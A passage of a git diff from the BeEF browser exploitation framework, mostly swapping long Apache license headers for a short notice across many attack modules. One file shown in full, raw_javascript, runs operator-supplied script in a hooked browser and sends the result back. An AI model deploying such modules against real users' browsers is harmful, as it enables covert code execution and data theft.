 class Iframe_keylogger < BeEF::Core::Command
   
diff --git a/modules/misc/iframe_sniffer/command.js b/modules/misc/iframe_sniffer/command.js
index 21e6987d5..0d041d9aa 100644
--- a/modules/misc/iframe_sniffer/command.js
+++ b/modules/misc/iframe_sniffer/command.js
@@ -1,19 +1,10 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
 
+
 beef.execute(function() {
   var inputURL = '<%= @inputUrl %>';
   var anchorsToCheck = '<%= @anchorsToCheck %>';
diff --git a/modules/misc/iframe_sniffer/config.yaml b/modules/misc/iframe_sniffer/config.yaml
index 61c796fa1..70ec201e5 100644
--- a/modules/misc/iframe_sniffer/config.yaml
+++ b/modules/misc/iframe_sniffer/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/misc/iframe_sniffer/module.rb b/modules/misc/iframe_sniffer/module.rb
index 7af2804af..effa6a213 100644
--- a/modules/misc/iframe_sniffer/module.rb
+++ b/modules/misc/iframe_sniffer/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Iframe_sniffer < BeEF::Core::Command
 
diff --git a/modules/misc/invisible_iframe/command.js b/modules/misc/invisible_iframe/command.js
index a0763583c..01eab25c9 100644
--- a/modules/misc/invisible_iframe/command.js
+++ b/modules/misc/invisible_iframe/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 	var target = "<%= @target %>";
diff --git a/modules/misc/invisible_iframe/config.yaml b/modules/misc/invisible_iframe/config.yaml
index b391c048a..b7686b944 100644
--- a/modules/misc/invisible_iframe/config.yaml
+++ b/modules/misc/invisible_iframe/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/misc/invisible_iframe/module.rb b/modules/misc/invisible_iframe/module.rb
index 1bfb45b60..357c78f96 100644
--- a/modules/misc/invisible_iframe/module.rb
+++ b/modules/misc/invisible_iframe/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Invisible_iframe < BeEF::Core::Command
 
diff --git a/modules/misc/local_file_theft/command.js b/modules/misc/local_file_theft/command.js
index 614cdc659..868eb9b4c 100644
--- a/modules/misc/local_file_theft/command.js
+++ b/modules/misc/local_file_theft/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 // local_file_theft
 //
 // Shamelessly plagurised from kos.io/xsspwn
diff --git a/modules/misc/local_file_theft/config.yaml b/modules/misc/local_file_theft/config.yaml
index d6b2c0be4..27ae15b9a 100644
--- a/modules/misc/local_file_theft/config.yaml
+++ b/modules/misc/local_file_theft/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 #  local_file_theft
 #
diff --git a/modules/misc/local_file_theft/module.rb b/modules/misc/local_file_theft/module.rb
index 20dd2a5a9..f720d70a4 100644
--- a/modules/misc/local_file_theft/module.rb
+++ b/modules/misc/local_file_theft/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 # local_file_theft
 #
diff --git a/modules/misc/raw_javascript/command.js b/modules/misc/raw_javascript/command.js
index 15ece6d01..ac69d88d4 100644
--- a/modules/misc/raw_javascript/command.js
+++ b/modules/misc/raw_javascript/command.js
@@ -1,33 +1,24 @@
-//
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
-//
-beef.execute(function() {
-	var result; 
-
-	try { 
-		result = function() {<%= @cmd %>}(); 
-	} catch(e) { 
-		for(var n in e) 
-			result+= n + " " + e[n] + "\n"; 
-	} 
-	
-	beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+result);
-});
-
-
-
-
-
- 
+//
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+	var result; 
+
+	try { 
+		result = function() {<%= @cmd %>}(); 
+	} catch(e) { 
+		for(var n in e) 
+			result+= n + " " + e[n] + "\n"; 
+	} 
+	
+	beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+result);
+});
+
+
+
+
+
+ 
diff --git a/modules/misc/raw_javascript/config.yaml b/modules/misc/raw_javascript/config.yaml
index 3f9512332..f344295f8 100644
--- a/modules/misc/raw_javascript/config.yaml
+++ b/modules/misc/raw_javascript/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/misc/raw_javascript/module.rb b/modules/misc/raw_javascript/module.rb
index 5a507d0b8..c5f97855d 100644
--- a/modules/misc/raw_javascript/module.rb
+++ b/modules/misc/raw_javascript/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Raw_javascript < BeEF::Core::Command
   
diff --git a/modules/network/detect_soc_nets/command.js b/modules/network/detect_soc_nets/command.js
index 333bce662..162cffb53 100644
--- a/modules/network/detect_soc_nets/command.js
+++ b/modules/network/detect_soc_nets/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 	var facebookresult = "";
diff --git a/modules/network/detect_soc_nets/config.yaml b/modules/network/detect_soc_nets/config.yaml
index 90a1c6355..33e374c5e 100644
--- a/modules/network/detect_soc_nets/config.yaml
+++ b/modules/network/detect_soc_nets/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/network/detect_soc_nets/module.rb b/modules/network/detect_soc_nets/module.rb
index 8cb1549e1..0cb515b6b 100644
--- a/modules/network/detect_soc_nets/module.rb
+++ b/modules/network/detect_soc_nets/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Detect_soc_nets < BeEF::Core::Command
   
diff --git a/modules/network/detect_tor/command.js b/modules/network/detect_tor/command.js
index 78b94c763..fb9dc6a47 100644
--- a/modules/network/detect_tor/command.js
+++ b/modules/network/detect_tor/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 	if (document.getElementById('torimg')) {
diff --git a/modules/network/detect_tor/config.yaml b/modules/network/detect_tor/config.yaml
index d0294391e..5dc3db360 100644
--- a/modules/network/detect_tor/config.yaml
+++ b/modules/network/detect_tor/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/network/detect_tor/module.rb b/modules/network/detect_tor/module.rb
index f75c91be9..05f654bf4 100644
--- a/modules/network/detect_tor/module.rb
+++ b/modules/network/detect_tor/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Detect_tor < BeEF::Core::Command
   
diff --git a/modules/network/dns_enumeration/command.js b/modules/network/dns_enumeration/command.js
index 4e3ea47d0..011af3b91 100644
--- a/modules/network/dns_enumeration/command.js
+++ b/modules/network/dns_enumeration/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
     var dns_list = "<%= @dns_list %>";
diff --git a/modules/network/dns_enumeration/config.yaml b/modules/network/dns_enumeration/config.yaml
index 93327e416..415e79889 100644
--- a/modules/network/dns_enumeration/config.yaml
+++ b/modules/network/dns_enumeration/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/network/dns_enumeration/module.rb b/modules/network/dns_enumeration/module.rb
index 21449af1d..c68595372 100644
--- a/modules/network/dns_enumeration/module.rb
+++ b/modules/network/dns_enumeration/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 #
 # DNS Enumeration
diff --git a/modules/network/internal_network_fingerprinting/command.js b/modules/network/internal_network_fingerprinting/command.js
index ddcd897cd..ef7e669a6 100644
--- a/modules/network/internal_network_fingerprinting/command.js
+++ b/modules/network/internal_network_fingerprinting/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
     var dom = document.createElement('b');
diff --git a/modules/network/internal_network_fingerprinting/config.yaml b/modules/network/internal_network_fingerprinting/config.yaml
index 2b87ff7c9..46ef6e363 100644
--- a/modules/network/internal_network_fingerprinting/config.yaml
+++ b/modules/network/internal_network_fingerprinting/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/network/internal_network_fingerprinting/module.rb b/modules/network/internal_network_fingerprinting/module.rb
index b4eff3e26..91a74a2e9 100644
--- a/modules/network/internal_network_fingerprinting/module.rb
+++ b/modules/network/internal_network_fingerprinting/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 #
 # Internal Network Fingerprinting
diff --git a/modules/network/nat_pinning_irc/command.js b/modules/network/nat_pinning_irc/command.js
index 4caef4fef..21d3f52eb 100644
--- a/modules/network/nat_pinning_irc/command.js
+++ b/modules/network/nat_pinning_irc/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
   var privateip = '<%= @privateip %>';
   var privateport = '<%= @privateport %>';
diff --git a/modules/network/nat_pinning_irc/config.yaml b/modules/network/nat_pinning_irc/config.yaml
index 784c7e7be..fead9f598 100644
--- a/modules/network/nat_pinning_irc/config.yaml
+++ b/modules/network/nat_pinning_irc/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/network/nat_pinning_irc/module.rb b/modules/network/nat_pinning_irc/module.rb
index a934c79da..75ed299c2 100644
--- a/modules/network/nat_pinning_irc/module.rb
+++ b/modules/network/nat_pinning_irc/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Irc_nat_pinning < BeEF::Core::Command
 
diff --git a/modules/network/ping_sweep/command.js b/modules/network/ping_sweep/command.js
index acddd61ea..0e4fa7513 100644
--- a/modules/network/ping_sweep/command.js
+++ b/modules/network/ping_sweep/command.js
@@ -1,19 +1,10 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
 
+
 beef.execute(function() {
 
     var ips = new Array();
diff --git a/modules/network/ping_sweep/config.yaml b/modules/network/ping_sweep/config.yaml
index 1e9fa9a7d..1fd9010d5 100644
--- a/modules/network/ping_sweep/config.yaml
+++ b/modules/network/ping_sweep/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/network/ping_sweep/module.rb b/modules/network/ping_sweep/module.rb
index cc8c7120d..28843fe48 100644
--- a/modules/network/ping_sweep/module.rb
+++ b/modules/network/ping_sweep/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 #
 # Ping Sweep Module - jgaliana
diff --git a/modules/network/ping_sweep_java/command.js b/modules/network/ping_sweep_java/command.js
index cd5fcc719..657ae87a6 100644
--- a/modules/network/ping_sweep_java/command.js
+++ b/modules/network/ping_sweep_java/command.js
@@ -1,19 +1,10 @@
 //
